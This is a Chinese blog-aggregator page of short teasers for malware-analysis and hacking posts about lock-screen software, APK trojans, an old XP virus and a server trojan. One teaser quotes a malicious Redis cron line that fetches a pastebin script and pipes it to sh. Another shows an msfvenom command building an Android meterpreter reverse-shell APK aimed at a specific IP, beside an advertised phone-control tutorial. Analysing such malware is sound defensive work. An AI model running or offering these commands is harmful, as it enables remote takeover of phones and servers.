有一天,在機緣巧合之下我獲得了一個鎖機軟件(是多巧合阿喂!),然后興高采烈的把它拖入了虛擬機里蹂躪(>_<!)。 很巧,軟件有虛擬機檢測。。。 Emmmm好吧,隨便過一下。。。 我用的虛擬機是VMware12,網上查到了一段過檢測的代碼 ...
寫個筆記記錄一下,起因是朋友在QQ上發了個連接叫我看看 安不安全,叫我幫他看看,反正在店里待着也沒生意,那就順便看看咯。 打開這個網址 會自動彈出下載一個名為OOXX的APK安裝包。 起先我的思路是想先從這個網站下手 先搞定這個網站或者服務器吧, 然后我就去網站主頁看了下。是一個網址縮短 變形 的網站。 那么我們給地址還原成真實地址,http: . . . : ooxx.apk 這就是真實的網址。 ...
2016-01-07 16:43 1 5283 推薦指數:
有一天,在機緣巧合之下我獲得了一個鎖機軟件(是多巧合阿喂!),然后興高采烈的把它拖入了虛擬機里蹂躪(>_<!)。 很巧,軟件有虛擬機檢測。。。 Emmmm好吧,隨便過一下。。。 我用的虛擬機是VMware12,網上查到了一段過檢測的代碼 ...
0x00 前言 這個病毒應該是比較簡單的,別人給我的樣本,讓我幫忙看看,看樣子是很早的一個病毒,針對Windows XP系統的,行為分析很簡單,但是想着不能就僅僅分析關鍵點,要不就把整個結構給逆向出來,弄了兩天,搞的差不多了,簡單的記錄一下。 0x01 基本介紹 整個病毒是4個文件組成 ...
使用Kali的metasploit生成安卓APK木馬控制安卓手機 前提:在虛擬機里面安裝kali系統,再就是本機安裝一個夜神模擬器,和一個安卓5的環境 如果不會的話,可以報名跟我們學習,聯系方式hk007.cn 第一步:在終端輸入ip addr命令查看kali主機的IP地址 ...
病毒包和工具包下載:Github 一.前言 二.建立對手動查殺病毒技術的正確認識 1.病毒分析方法 2.病毒查殺步驟 3.必備知識 * 1) 熟悉windows系統進程 * 2) 熟悉常見端口與進程對應關系 * 3) 熟悉windows自帶系統服務 ...
病毒來源:朋友服務器發現此木馬 當時為了提樣本搞了很久,一直找恢復文件,對提取樣本有研究的朋友還請指導指導。 文件名:vister.exe MD5:30866adc2976704bca0f051b5474a1ee 此處創建了一個進程 申明了一個2800大小 ...
起因 偶然間發現redis里有一個陌生key:tightsoft,它的值是:*/1 * * * * root curl -fsSL https://pastebin.com/raw/xbY7p5Tb|sh 看key名就知道這肯定不是我們存的,再看value我警覺了,這是要定時執行腳本啊。 分析 ...
創建個通道./ngrok tcp 1113 msfvenom -p android/meterpreter/reverse_tcp LHOST=52.15.62.13 LPORT=17016 R > ttxd.apk 現在我把這個apk導入到手機上然后運行 ...
記一次小米手機安裝Google Play(其他手機類似) 最近換了一款小米10青春版,性價比很高,對於開發者而言,手機自帶商店的軟件內容往往不能滿足需求,而需要單獨定制習慣性的APP,博主通過最近的嘗試,已經成功將內容安裝到手機,並分享整理如下。 手機:小米10青春版 版本 ...